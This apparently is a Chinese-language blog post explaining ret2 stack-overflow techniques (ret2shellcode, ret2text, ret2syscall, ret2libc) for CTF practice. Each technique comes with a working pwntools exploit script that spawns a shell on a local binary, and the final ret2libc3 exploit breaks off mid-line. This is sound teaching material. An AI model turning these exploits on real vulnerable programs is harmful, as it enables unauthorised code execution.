<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"pie-zy.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":{"enable":true,"mode":"dark"},"version":"8.23.1","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"border_radius":8,"copy_button":{"enable":true,"show_result":true,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":true,"highlight":true}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="ret2的几种攻击原理总结主要是对ret2libc3的详细过程总结  修改返回地址，让其指向溢出数据中的一段指令（shellcode） 修改返回地址，让其指向内存中已有的某个函数（ret2text） 修改返回地址，让其指向内存中已有的数段指令（ret2syscall） 有system无&#x3D;有&#x2F;bin&#x2F;sh，直接传入system地址和参数地址（ret2libc1） 有sy">
<meta property="og:type" content="article">
<meta property="og:title" content="ret2的几种攻击原理总结">
<meta property="og:url" content="https://pie-zy.github.io/2025/06/25/ret2%E7%9A%84%E5%87%A0%E7%A7%8D%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="Pie">
<meta property="og:description" content="ret2的几种攻击原理总结主要是对ret2libc3的详细过程总结  修改返回地址，让其指向溢出数据中的一段指令（shellcode） 修改返回地址，让其指向内存中已有的某个函数（ret2text） 修改返回地址，让其指向内存中已有的数段指令（ret2syscall） 有system无&#x3D;有&#x2F;bin&#x2F;sh，直接传入system地址和参数地址（ret2libc1） 有sy">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-06-25T06:52:00.000Z">
<meta property="article:modified_time" content="2025-06-25T07:28:14.592Z">
<meta property="article:author" content="zy">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://pie-zy.github.io/2025/06/25/ret2%E7%9A%84%E5%87%A0%E7%A7%8D%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86%E6%80%BB%E7%BB%93/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://pie-zy.github.io/2025/06/25/ret2%E7%9A%84%E5%87%A0%E7%A7%8D%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86%E6%80%BB%E7%BB%93/","path":"2025/06/25/ret2的几种攻击原理总结/","title":"ret2的几种攻击原理总结"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>ret2的几种攻击原理总结 | Pie</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Pie</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">搭一个属于自己的小窝</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ret2%E7%9A%84%E5%87%A0%E7%A7%8D%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86%E6%80%BB%E7%BB%93"><span class="nav-number">1.</span> <span class="nav-text">ret2的几种攻击原理总结</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ret2shellcode"><span class="nav-number">1.1.</span> <span class="nav-text">ret2shellcode</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ret2text"><span class="nav-number">1.2.</span> <span class="nav-text">ret2text</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ret2syscall"><span class="nav-number">1.3.</span> <span class="nav-text">ret2syscall</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ret2libc2"><span class="nav-number">1.4.</span> <span class="nav-text">ret2libc2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E4%BD%93%E6%80%9D%E8%B7%AF"><span class="nav-number">1.4.1.</span> <span class="nav-text">总体思路</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC%E5%AF%B9%E6%AF%94"><span class="nav-number">1.4.2.</span> <span class="nav-text">脚本对比</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC%E4%B8%80"><span class="nav-number">1.4.2.1.</span> <span class="nav-text">脚本一</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC%E4%BA%8C"><span class="nav-number">1.4.2.2.</span> <span class="nav-text">脚本二</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ret2libc3"><span class="nav-number">1.5.</span> <span class="nav-text">ret2libc3</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ret2libc3%E6%80%9D%E8%B7%AF%E5%88%86%E6%9E%90"><span class="nav-number">1.5.1.</span> <span class="nav-text">ret2libc3思路分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%85%B3%E9%94%AE%E7%82%B91%EF%BC%9A%E5%A6%82%E4%BD%95%E5%88%A9%E7%94%A8%E6%B3%84%E9%9C%B2%E7%9A%84%E4%BF%A1%E6%81%AF%E6%89%BE%E5%87%BAlibc%E7%9A%84%E5%9F%BA%E5%9D%80"><span class="nav-number">1.5.1.1.</span> <span class="nav-text">关键点1：如何利用泄露的信息找出libc的基址</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%85%B3%E9%94%AE%E7%82%B92%EF%BC%9A%E6%89%BE%E5%88%B0pwn%E6%94%BB%E5%87%BB%E7%82%B9"><span class="nav-number">1.5.1.2.</span> <span class="nav-text">关键点2：找到pwn攻击点</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%8C%E6%95%B4exp"><span class="nav-number">1.5.2.</span> <span class="nav-text">完整exp</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zy"
      src="/images/pie.png">
  <p class="site-author-name" itemprop="name">zy</p>
  <div class="site-description" itemprop="description">星星之火，可以燎原</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">2</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://pie-zy.github.io/2025/06/25/ret2%E7%9A%84%E5%87%A0%E7%A7%8D%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86%E6%80%BB%E7%BB%93/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/pie.png">
      <meta itemprop="name" content="zy">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pie">
      <meta itemprop="description" content="星星之火，可以燎原">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="ret2的几种攻击原理总结 | Pie">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ret2的几种攻击原理总结
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2025-06-25 14:52:00 / 修改时间：15:28:14" itemprop="dateCreated datePublished" datetime="2025-06-25T14:52:00+08:00">2025-06-25</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Pwn/" itemprop="url" rel="index"><span itemprop="name">Pwn</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>4.3k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>8 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="ret2的几种攻击原理总结"><a href="#ret2的几种攻击原理总结" class="headerlink" title="ret2的几种攻击原理总结"></a>ret2的几种攻击原理总结</h1><p>主要是对ret2libc3的详细过程总结</p>
<ul>
<li>修改返回地址，让其指向溢出数据中的一段指令（<strong>shellcode</strong>）</li>
<li>修改返回地址，让其指向内存中已有的某个函数（<strong>ret2text</strong>）</li>
<li>修改返回地址，让其指向内存中已有的数段指令（<strong>ret2syscall</strong>）</li>
<li><strong>有system无&#x3D;有&#x2F;bin&#x2F;sh</strong>，直接传入system地址和参数地址（<strong>ret2libc1</strong>）</li>
<li><strong>有system无&#x2F;bin&#x2F;sh</strong>，修改返回地址，传入bin_sh并执行system（<strong>ret2libc2</strong>）</li>
<li><strong>无system无&#x2F;bin&#x2F;sh</strong>，修改返回地址，让其执行libc中的函数（<strong>ret2libc3</strong>）</li>
</ul>
<h2 id="ret2shellcode"><a href="#ret2shellcode" class="headerlink" title="ret2shellcode"></a>ret2shellcode</h2><p>buf2变量地址在bss段中，但是他的具体执行内容是存储在栈段中的，这里bss段可执行，所以我们能写入buf2所在的bss段中，能够执行shellcode</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io=process(<span class="string">&quot;/home/pie/pwn-challenge/./ret2shellcode&quot;</span>)</span><br><span class="line"></span><br><span class="line">buf2=<span class="number">0x0804A080</span></span><br><span class="line"></span><br><span class="line">payload=asm(shellcraft.sh()).ljust(<span class="number">112</span>,<span class="string">b&#x27;A&#x27;</span>)</span><br><span class="line">payload+=p32(buf2)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h2><p>有后门函数的情况，将返回地址改为后门函数所在地址，直接ret执行后门函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&#x27;./ret2text&#x27;</span>)</span><br><span class="line">target = <span class="number">0x804863a</span></span><br><span class="line">io.sendline(<span class="string">b&#x27;A&#x27;</span> * (<span class="number">0x6c</span> + <span class="number">4</span>) + p32(target))</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="ret2syscall"><a href="#ret2syscall" class="headerlink" title="ret2syscall"></a>ret2syscall</h2><p>通过Ropgadget找到gadget片段，然后构造系统调用</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binsh=<span class="number">0x080be408</span></span><br><span class="line">int_80=<span class="number">0x08049421</span></span><br><span class="line">pop_eax_ret=<span class="number">0x080bb196</span></span><br><span class="line">pop_edx_ecx_ebx_ret=<span class="number">0x0806eb90</span></span><br><span class="line"></span><br><span class="line">payload=flat([<span class="string">b&#x27;a&#x27;</span>*<span class="number">112</span>,pop_eax_ret,<span class="number">0xb</span>,pop_edx_ecx_ebx_ret,<span class="number">0</span>,<span class="number">0</span>,binsh,int_80])</span><br><span class="line"></span><br><span class="line">io=process(<span class="string">&quot;/home/pie/pwn-challenge/./ret2syscall&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="ret2libc2"><a href="#ret2libc2" class="headerlink" title="ret2libc2"></a>ret2libc2</h2><h3 id="总体思路"><a href="#总体思路" class="headerlink" title="总体思路"></a>总体思路</h3><p>两次交互</p>
<p>思路：这里面并没有<code>/bin/sh</code>字段，存在栈溢出<code>gets</code>函数，存在<code>system</code>函数调用，我们的主体思路就是利用两次交互，第一次输入进行栈溢出漏洞利用，第二次进行<code>system</code>所需要的参数<code>/bin/sh</code>输入</p>
<p>上面的两次<code>p32(buf2)</code>就是利用了两次bss段中的<code>buf2</code>变量</p>
<h3 id="脚本对比"><a href="#脚本对比" class="headerlink" title="脚本对比"></a>脚本对比</h3><h4 id="脚本一"><a href="#脚本一" class="headerlink" title="脚本一"></a>脚本一</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io=process(<span class="string">&quot;/home/pie/pwn-challenge/./ret2libc2&quot;</span>)</span><br><span class="line">gets_plt=<span class="number">0x8048460</span></span><br><span class="line">sys_plt=<span class="number">0x8048490</span></span><br><span class="line">buf2=<span class="number">0x0804A080</span></span><br><span class="line"></span><br><span class="line">payload1=<span class="string">b&#x27;A&#x27;</span>*<span class="number">112</span></span><br><span class="line">payload1+=p32(gets_plt)+p32(sys_plt)+p32(buf2)+p32(buf2)</span><br><span class="line">io.sendline(payload1)</span><br><span class="line"></span><br><span class="line">payload2=<span class="string">b&#x27;/bin/sh\x00&#x27;</span></span><br><span class="line">io.sendline(payload2)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>脚本一中为什么<code>payload1</code>中的函数会一直执行下去，因为执行完gets函数之后，函数之中自带一个<code>ret</code>，<code>ret</code>会影响到eip，使得<code>eip</code>弹出到<code>sys_plt</code>位置，同样<code>system</code>函数执行完之后，eip会弹出到第一个<code>buf2</code>位置</p>
<h4 id="脚本二"><a href="#脚本二" class="headerlink" title="脚本二"></a>脚本二</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./ret2libc2&#x27;</span>)</span><br><span class="line"></span><br><span class="line">gets_plt = <span class="number">0x08048460</span></span><br><span class="line">system_plt = <span class="number">0x08048490</span></span><br><span class="line">pop_ebx_ret = <span class="number">0x0804843d</span></span><br><span class="line">buf2 = <span class="number">0x804a080</span></span><br><span class="line">payload = flat(</span><br><span class="line">    [<span class="string">b&#x27;a&#x27;</span> * <span class="number">112</span>, gets_plt, pop_ebx_ret, buf2, system_plt, pop_ebx_ret, buf2])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.sendline(<span class="string">b&#x27;/bin/sh&#x27;</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>脚本二普适性更强，因为它不仅达到了目的，而且清理了栈段，让栈能够恢复平衡</p>
<p>在<code>ret address</code>处填<code>gets</code>函数地址，会跳转到<code>gets</code>函数执行，此时栈顶处于<code>pop_ebx_ret</code>处，之后gets函数调用结束会有一次<code>ret</code>，此时将<code>pop_ebx_ret</code>这条指令放入eip，esp向上到<code>buf2</code>位置，执行<code>pop_ebx_ret</code>指令，弹出<code>buf2</code>，esp依旧向上到<code>system_plt</code>位置，执行<code>ret</code>将<code>system_plt</code>命令放入eip，再重复上面操作…</p>
<p>这个操作过后，不仅达到了效果，而且实现了堆栈平衡，将我们人为添加的<code>buf2</code>变量进行了弹出</p>
<h2 id="ret2libc3"><a href="#ret2libc3" class="headerlink" title="ret2libc3"></a>ret2libc3</h2><h3 id="ret2libc3思路分析"><a href="#ret2libc3思路分析" class="headerlink" title="ret2libc3思路分析"></a>ret2libc3思路分析</h3><p>本题是一个基础的pwn攻击，原理是要利用泄露的信息，即libc中泄露出真实地址，来找出基址，进而用libc调用system函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//反汇编代码</span></span><br><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> **v4; <span class="comment">// [esp+4h] [ebp-11Ch]</span></span><br><span class="line">  <span class="type">int</span> v5; <span class="comment">// [esp+8h] [ebp-118h]</span></span><br><span class="line">  <span class="type">char</span> src[<span class="number">256</span>]; <span class="comment">// [esp+12h] [ebp-10Eh] BYREF</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">10</span>]; <span class="comment">// [esp+112h] [ebp-Eh] BYREF</span></span><br><span class="line">  <span class="type">const</span> <span class="type">void</span> **v8; <span class="comment">// [esp+11Ch] [ebp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;###############################&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Do you know return to library ?&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;###############################&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;What do you want to see in memory?&quot;</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Give me an address (in dec) :&quot;</span>);</span><br><span class="line">  fflush(<span class="built_in">stdout</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">0xAu</span>);</span><br><span class="line">  v8 = (<span class="type">const</span> <span class="type">void</span> **)strtol(buf, v4, v5);</span><br><span class="line">  See_something(v8);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Leave some message for me :&quot;</span>);</span><br><span class="line">  fflush(<span class="built_in">stdout</span>);</span><br><span class="line">  read(<span class="number">0</span>, src, <span class="number">0x100u</span>);</span><br><span class="line">  Print_message(src);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Thanks you ~&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析这个程序，先分析下栈上一些函数变量的大概位置</p>
<table>
<thead>
<tr>
<th align="center">ebp</th>
<th align="center"></th>
</tr>
</thead>
<tbody><tr>
<td align="center">v8</td>
<td align="center">变量在栈上的相对位置（看变量后和ebp的距离）</td>
</tr>
<tr>
<td align="center">buf</td>
<td align="center"></td>
</tr>
<tr>
<td align="center">src</td>
<td align="center"></td>
</tr>
<tr>
<td align="center">v5</td>
<td align="center"></td>
</tr>
<tr>
<td align="center">v4</td>
<td align="center"></td>
</tr>
<tr>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">Print_message</td>
<td align="center">先被调用的函数在栈的下面</td>
</tr>
<tr>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">dest</td>
<td align="center"></td>
</tr>
<tr>
<td align="center">strcpy</td>
<td align="center"></td>
</tr>
<tr>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">See_something</td>
<td align="center"></td>
</tr>
</tbody></table>
<p>观察其中几个函数，其中see_something是打印v8变量的真实地址，而print_message中有一个strcpy</p>
<h4 id="关键点1：如何利用泄露的信息找出libc的基址"><a href="#关键点1：如何利用泄露的信息找出libc的基址" class="headerlink" title="关键点1：如何利用泄露的信息找出libc的基址"></a>关键点1：如何利用泄露的信息找出libc的基址</h4><p>这个题目中直接给了我们一个泄露地址函数，即为<code>See_something</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> <span class="built_in">printf</span>(<span class="string">&quot;The content of the address : %p\n&quot;</span>, *a1);</span><br></pre></td></tr></table></figure>

<p>会将我们第一个传入的参数buf作为一个地址，并将这个地址的内容打印出来 -&gt; 也就是我们能通过传入一个地址获取该地址的内容</p>
<p>传入<code>puts_got</code>即能够获得puts的真实地址，再通过<code>libc.sym[&quot;puts&quot;]</code>获取到<code>puts</code>函数在libc中的偏移，<strong>基址&#x3D;真实地址-偏移</strong></p>
<h4 id="关键点2：找到pwn攻击点"><a href="#关键点2：找到pwn攻击点" class="headerlink" title="关键点2：找到pwn攻击点"></a>关键点2：找到pwn攻击点</h4><p>攻击点在<code>Print_message(src);</code>函数中，利用其中的strcpy进行栈溢出攻击，而前面的<code>See_something</code>和其他一些read则用来获得关键点1中的数据</p>
<h3 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp"></a>完整exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io=process(<span class="string">&quot;./ret2libc3&quot;</span>)</span><br><span class="line"></span><br><span class="line">elf=ELF(<span class="string">&quot;./ret2libc3&quot;</span>)</span><br><span class="line">libc=ELF(<span class="string">&quot;/lib/i386-linux-gnu/libc.so.6&quot;</span>)</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">b&quot; :&quot;</span>,<span class="built_in">str</span>(elf.got[<span class="string">&quot;puts&quot;</span>]).encode())</span><br><span class="line">io.recvuntil(<span class="string">b&quot; : &quot;</span>)</span><br><span class="line">libcBase=<span class="built_in">int</span>(io.recvuntil(<span class="string">b&quot;\n&quot;</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)-libc.symbols[<span class="string">&quot;puts&quot;</span>]</span><br><span class="line"></span><br><span class="line">success(<span class="string">&quot;libcBase -&gt; &#123;:#x&#125;&quot;</span>.<span class="built_in">format</span>(libcBase))</span><br><span class="line"></span><br><span class="line">payload=flat([cyclic(<span class="number">60</span>),libcBase+libc.symbols[<span class="string">&quot;system&quot;</span>],<span 